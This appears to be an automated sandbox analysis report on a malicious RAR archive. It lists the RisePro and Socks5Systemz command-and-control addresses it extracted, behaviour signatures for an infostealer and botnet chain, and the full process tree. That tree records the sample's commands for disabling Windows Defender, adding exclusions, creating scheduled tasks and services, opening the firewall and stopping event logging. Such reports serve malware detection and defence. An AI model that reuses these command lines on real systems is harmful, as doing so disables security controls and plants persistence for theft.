Analysis
-
max time kernel
441s -
max time network
448s -
platform
windows7_x64 -
resource
win7-20240611-en -
resource tags
-
submitted
15-06-2024 20:50
General
-
Target
file.rar
-
Size
8.8MB
-
MD5
3443deb58509fdef6b491faecb2af7c3
-
SHA1
06a8d45a279f1b5bccb37f20f1d0551860aa1849
-
SHA256
0e1dc7a84177af8d5ce9df7049e6fbd7ee7c4acf65e4e882383baa343700a85b
-
SHA512
d5a43c37257c045b69c4316cced0a50b32386560851710c82549b3e5b342db090168d4563a5272814e5a1399486b74f4bc3fc2723ec553577cb34fdf3bd981fa
-
SSDEEP
196608:ulofIzfDC8WqVrQT4tzXXg83wb0MCKFu46X9PckOeIXhGQN:u3TN3A83gKK84OHOeEN
Malware Config
Extracted
risepro
147.45.47.126:58709
Extracted
socks5systemz
csgsnhz.net
http://csgsnhz.net/search/?q=67e28dd86f5ff42d4509ac187c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4de8889b5e4fa9281ae978f771ea771795af8e05c645db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a6f8af714c0ee92
http://csgsnhz.net/search/?q=67e28dd86f5ff42d4509ac187c27d78406abdd88be4b12eab517aa5c96bd86ec928644825a8bbc896c58e713bc90c91836b5281fc235a925ed3e54d6bd974a95129070b616e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff810c8eb9d9f3bcc68
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Windows security bypass 2 TTPs 41 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 1 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 25 IoCs
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks for any installed AV software in registry 1 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 35 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 24 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 7 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 19 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 2 IoCs
-
Modifies system certificate store 2 TTPs 11 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\file.rar1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\file.rar2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\file.rar3⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\file.rar"4⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\verclsid.exe"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x4011⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\file\" -spe -an -ai#7zMap23962:88:7zEvent16011⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\file\setup.exe"C:\Users\Admin\AppData\Local\Temp\file\setup.exe"1⤵
- Modifies firewall policy service
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exeC:\Users\Admin\Documents\SimpleAdobe\HZCRf2RVpwaPOKWoRBM82pMK.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS13CF.tmp\Install.exe.\Install.exe /hsdidPpAQu "385135" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bKPbLIPtdWjYWtgKbM" /SC once /ST 20:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe\" M5 /dNcdidaLlL 385135 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bKPbLIPtdWjYWtgKbM6⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bKPbLIPtdWjYWtgKbM7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 592 -s 6045⤵
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exeC:\Users\Admin\Documents\SimpleAdobe\jNFCat12JprTAJuHReQN2XR8.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exeC:\Users\Admin\Documents\SimpleAdobe\QsEZf7p3mqmJQ7IoFER23P5U.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\ProgramData\DBKKFHIEGD.exe"C:\ProgramData\DBKKFHIEGD.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2688 -s 685⤵
- Loads dropped DLL
- Program crash
-
C:\ProgramData\BFHJECAAAF.exe"C:\ProgramData\BFHJECAAAF.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 700 -s 485⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\HIIEBAFCBKFI" & exit4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exeC:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\vmffvbwj\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hkdooxyy.exe" C:\Windows\SysWOW64\vmffvbwj\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create vmffvbwj binPath= "C:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description vmffvbwj "wifi internet conection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start vmffvbwj3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exeC:\Users\Admin\Documents\SimpleAdobe\fw6AeST27Bm2vlk0DxSBSQX2.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\aj2A10.exe"C:\Users\Admin\AppData\Local\Temp\aj2A10.exe" /relaunch=8 /was_elevated=1 /tagdata3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- Writes to the Master Boot Record (MBR)
- Modifies system certificate store
-
C:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exeC:\Users\Admin\Documents\SimpleAdobe\Pus3tCSrefwVPztCKhp87ihX.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "RULTVSKP"3⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exeC:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmp"C:\Users\Admin\AppData\Local\Temp\is-2RQFV.tmp\DH8573Md6ciWRCrzNsLgNn0N.tmp" /SL5="$20278,5623997,54272,C:\Users\Admin\Documents\SimpleAdobe\DH8573Md6ciWRCrzNsLgNn0N.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe"C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe"C:\Users\Admin\AppData\Local\SVO Media Player\svomediaplayer32.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exeC:\Users\Admin\Documents\SimpleAdobe\f2hEJNjebYbdDHdjR8ZZyQ9Q.exe2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\file\setup.exe"C:\Users\Admin\AppData\Local\Temp\file\setup.exe"1⤵
- Executes dropped EXE
-
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeC:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵
-
C:\Windows\system32\svchost.exesvchost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exeC:\Windows\SysWOW64\vmffvbwj\hkdooxyy.exe /d"C:\Users\Admin\Documents\SimpleAdobe\2Bieq5wNDNkAsJ0rFBlk_AlN.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Windows security bypass
- Sets service image path in registry
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1581770322206360436-18189707221070211951-1484361193-533777962-19874667411007098208"1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {2FF7B39F-64EE-42D4-9F27-6430FAF2A4E4} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exeC:\Users\Admin\AppData\Local\Temp\WaFDGFyKTXBJSmLcQ\HCRvTsVXhEUoxKl\alRnUJb.exe M5 /dNcdidaLlL 385135 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNWllnHpu" /SC once /ST 13:45:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNWllnHpu"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNWllnHpu"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
